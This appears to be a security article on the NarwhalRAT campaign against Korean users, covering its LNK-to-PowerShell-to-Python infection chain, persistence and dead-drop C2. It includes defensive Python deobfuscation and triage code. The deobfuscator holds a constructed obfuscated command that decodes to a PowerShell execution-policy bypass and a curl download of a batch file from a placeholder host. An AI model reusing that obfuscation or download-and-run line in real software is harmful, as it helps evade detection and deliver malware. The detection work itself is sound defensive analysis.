Sophisticated Attack Uses LNK Files and Python Loader to Deploy NarwhalRAT

A recent cyberattack targeting Korean users relies on a carefully staged infection chain: deceptive shortcut files, native Windows utilities and a compiled Python payload install a remote access trojan (RAT) tracked as NarwhalRAT. Because every stage runs through legitimate binaries (PowerShell, curl.exe and the official Python interpreter), the activity blends with normal system behaviour and is hard to separate from it with signature-based tools alone.

The attack initiates with a spear-phishing email masquerading as an urgent security alert from the “Microsoft Account Team.” The email warns recipients of suspicious one-time password activities and prompts them to open an attached advisory document. However, the attachment is a ZIP archive containing a malicious LNK shortcut file, rather than a genuine document.

Upon execution of the LNK file, a multi-stage infection process begins. The shortcut's command line is obfuscated so that strings such as “powershell” and “curl.exe” are only assembled at runtime; a static scanner that searches the LNK for those literal strings finds nothing. This is a Living-off-the-Land approach: every tool involved is a legitimate, signed Windows component, so there is no foreign binary to flag until the final payload lands.
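The article does not reproduce the LNK's obfuscation scheme, so the following is an added example rather than the campaign's sample or Genians' code. It assumes one common way such tokens are rebuilt at runtime: cmd.exe's `%VAR:~start,len%` substring syntax combined with caret escapes and empty quote pairs. The environment values and the argument string are constructed for the example; the decoder re-implements cmd's substring semantics and then flags the tool names that appear only after decoding.

```python
import re

# Constructed environment table (typical Windows defaults) used to resolve the
# %VAR:~start,len% substring references below; the real LNK's scheme is not reproduced.
ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PROGRAMDATA": r"C:\ProgramData",
    "PUBLIC": r"C:\Users\Public",
    "PSMODULEPATH": r"C:\Program Files\WindowsPowerShell\Modules",
}

SUBSTRING_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
LOLBINS = ("powershell", "curl.exe", "cmd.exe", "mshta", "certutil", "bitsadmin", "rundll32")


def cmd_substring(value, start, length=None):
    """Mimic cmd.exe's %VAR:~start,len%: a negative start counts from the end,
    an omitted len runs to the end, a negative len drops characters from the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:e] if e > s else ""


def resolve_env_substrings(cmdline, env):
    def repl(m):
        name = m.group(1).upper()          # cmd variable names are case-insensitive
        if name not in env:
            return m.group(0)              # unknown variable: leave it for the analyst
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(env[name], int(m.group(2)), length)
    return SUBSTRING_RE.sub(repl, cmdline)


def strip_cmd_noise(cmdline):
    # '^' escapes the next character in cmd; an empty pair of quotes inside a
    # token splits it for a string scanner without changing what cmd executes.
    return cmdline.replace('""', "").replace("^", "")


def deobfuscate(cmdline, env=ENV):
    """Repeat until stable, since a resolved fragment may itself contain references."""
    previous, current = None, cmdline
    while current != previous:
        previous = current
        current = strip_cmd_noise(resolve_env_substrings(current, env))
    return current


def flag_lolbins(decoded):
    lowered = decoded.lower()
    return [name for name in LOLBINS if name in lowered]


# Constructed LNK argument string: "powershell" and "curl.exe" never appear literally.
SAMPLE_LNK_ARGS = (
    "/c "
    "%PROGRAMDATA:~3,1%%COMSPEC:~7,1%%COMSPEC:~8,1%%COMSPEC:~15,1%%PUBLIC:~6,1%"
    "%COMSPEC:~9,1%%PSMODULEPATH:~30,1%%COMSPEC:~-3,1%%PUBLIC:~12,1%%PUBLIC:~12,1%"
    " -w 1 -ep by^pass -c "
    '%COMSPEC:~20,1%""%PUBLIC:~10,1%%PUBLIC:~6,1%%PUBLIC:~12,1%%COMSPEC:~-4%'
    " -o x.bat http://example.invalid/x"
)

if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE_LNK_ARGS)
    print(decoded)
    print("flagged:", flag_lolbins(decoded))
```

The practical point is where the check runs: a rule that matches the literal `powershell` in the LNK's argument string misses this sample, while the same rule applied to the resolved command line, or to the process command line observed at execution time, catches it.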

Once decoded, the LNK launches PowerShell with the execution policy bypassed and uses a copy of curl.exe to download two files from a relay server. The first is a decoy HWP document, opened so the victim sees the document the email promised; the second is a batch script named KHjWFcuS.bat that runs the next stage of the installation in a hidden window.

The batch script then downloads the official Python embedded package and renames pythonw.exe to usersscreen.exe; pythonw.exe is the windowless interpreter, so no console appears when the payload runs. The final payload, config.cat, borrows the .cat extension of Windows security catalog files, but it is compiled Python bytecode acting as a backdoor loader. The extension is the only disguise: a genuine catalog is a DER-encoded PKCS#7 structure, whereas compiled Python begins with CPython's version-specific magic number, so inspecting the first bytes rather than the file name tells the two apart.

For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” that runs every minute. The name is built to resemble legitimate Microsoft tasks, so it is easy to overlook in a routine review of the task list; the one-minute repetition interval is the more reliable tell, since legitimate tasks rarely repeat that often.
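The stages described above (a renamed pythonw.exe, a bytecode payload with a .cat extension, a Hidden+System working directory and a one-minute scheduled task) are each individually observable on a host. The triage logic below is an added example, not Genians' tooling or code from the campaign. It runs over a constructed inventory that stands in for what a task list, PE version-info and directory-attribute lookups would return on a real machine; the user name, paths, the benign comparison task and the file headers are invented for the example.

```python
import importlib.util
import ntpath

INTERPRETER_ORIGINAL_NAMES = {"python.exe", "pythonw.exe"}
SCRIPT_EXTENSIONS = {".py", ".pyc", ".pyw"}

# Constructed host inventory standing in for Get-ScheduledTask output, PE
# VERSIONINFO and directory attributes; nothing below is a real artifact.
TASKS = [
    {"path": "\\MicrosoftUserInterfacePicturesUpdateTackMachine",
     "interval_s": 60,
     "exe": r"C:\Users\victim\AppData\Local\naverwhale\usersscreen.exe",
     "args": r"C:\Users\victim\AppData\Local\naverwhale\config.cat"},
    {"path": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "interval_s": 86400,
     "exe": r"C:\Windows\system32\sc.exe",
     "args": "start wuauserv"},
]
ORIGINAL_FILENAME = {   # OriginalFilename from each binary's VERSIONINFO resource
    r"C:\Users\victim\AppData\Local\naverwhale\usersscreen.exe": "pythonw.exe",
    r"C:\Windows\system32\sc.exe": "sc.exe",
}
HIDDEN_SYSTEM_DIRS = {r"C:\Users\victim\AppData\Local\naverwhale"}
FILE_HEADERS = {        # first 16 bytes of the files referenced by task arguments
    r"C:\Users\victim\AppData\Local\naverwhale\config.cat":
        importlib.util.MAGIC_NUMBER + b"\x00" * 12,
}


def looks_like_pyc(header):
    """Every CPython .pyc starts with a 2-byte version magic followed by b'\\r\\n';
    a genuine .cat file (DER-encoded PKCS#7) starts with 0x30 instead."""
    return len(header) >= 16 and header[2:4] == b"\r\n"


def hunt_task(task, original_filename, hidden_system_dirs, file_headers):
    findings = []
    exe = task["exe"]
    exe_name = ntpath.basename(exe).lower()
    orig = original_filename.get(exe, "").lower()

    if task["interval_s"] <= 60:
        findings.append(f"repeats every {task['interval_s']}s")
    if orig and orig != exe_name:
        findings.append(f"renamed binary: {exe_name} is really {orig}")
    if orig in INTERPRETER_ORIGINAL_NAMES and task["args"]:
        arg = task["args"].split()[0]      # first token; real paths may be quoted
        ext = ntpath.splitext(arg)[1].lower()
        if ext and ext not in SCRIPT_EXTENSIONS:
            findings.append(f"interpreter given non-script argument {ntpath.basename(arg)}")
            if looks_like_pyc(file_headers.get(arg, b"")):
                findings.append("argument file has a .pyc magic header")
    if ntpath.dirname(exe) in hidden_system_dirs:
        findings.append("action lives in a Hidden+System directory")
    name = task["path"].lower()
    if name.lstrip("\\").startswith("microsoft") and not name.startswith("\\microsoft\\"):
        findings.append("Microsoft-looking name outside the \\Microsoft task folder")
    return findings


def triage(tasks=TASKS, original_filename=ORIGINAL_FILENAME,
           hidden_system_dirs=HIDDEN_SYSTEM_DIRS, file_headers=FILE_HEADERS):
    """Map task path -> findings for every task that tripped at least one check."""
    report = {}
    for task in tasks:
        findings = hunt_task(task, original_filename, hidden_system_dirs, file_headers)
        if findings:
            report[task["path"]] = findings
    return report


if __name__ == "__main__":
    for path, findings in triage().items():
        print(path)
        for finding in findings:
            print("  -", finding)
```

None of the checks depends on a hash of the payload: the renamed interpreter is caught by comparing the on-disk name with the embedded OriginalFilename, the fake catalog by its header, and the task by its interval and by a name that imitates Microsoft's tree without living in it.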

Analysts at Genians Security Center have observed that this threat shares significant similarities with a Python-based backdoor campaign documented in May 2026. The malware has been dubbed NarwhalRAT, derived from the string “naverwhale” found within its code, likely an attempt to impersonate Naver Whale, a popular browser in South Korea.

NarwhalRAT's behaviour points to Korean users as its primary target. It uses “naverwhale” as its working directory name and sets the Hidden and System attributes on that folder, which keeps it out of a default Explorer view. It also handles KakaoTalk-related window identifiers specifically during data collection, a further sign of the intended audience.

The attackers use a dual command-and-control (C2) structure: a Korean relay server alongside the pCloud API as a dead-drop resolver, meaning the malware fetches its current C2 address from content hosted on a legitimate cloud service. The operators can therefore change the real C2 without touching the malware, and the lookup traffic goes to a popular web service that is unlikely to be blocked outright and easily passes as ordinary web activity.

The campaign relies almost entirely on legitimate tools and services (LNK files, PowerShell, curl.exe, the official Python distribution and pCloud), so signature-based detection alone is not enough. Organizations should pair user education on recognizing phishing lures with behavioural monitoring: a shortcut that spawns PowerShell and curl, a renamed interpreter started by a scheduled task every minute, or cloud-storage API traffic from a process that is not a browser are all observable regardless of what the payload's signatures look like.